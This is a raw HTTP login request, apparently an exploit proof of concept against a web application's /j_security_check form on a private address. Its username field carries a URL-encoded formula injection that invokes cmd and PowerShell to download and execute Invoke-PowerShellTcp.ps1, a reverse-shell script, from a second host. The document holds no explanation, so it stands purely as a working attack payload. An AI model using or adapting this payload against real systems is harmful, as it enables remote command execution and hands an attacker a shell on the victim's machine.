POST /j_security_check HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: https://192.168.1.253:9251
Referer: https://192.168.1.253:9251/j_security_check
Upgrade-Insecure-Requests: 1
j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28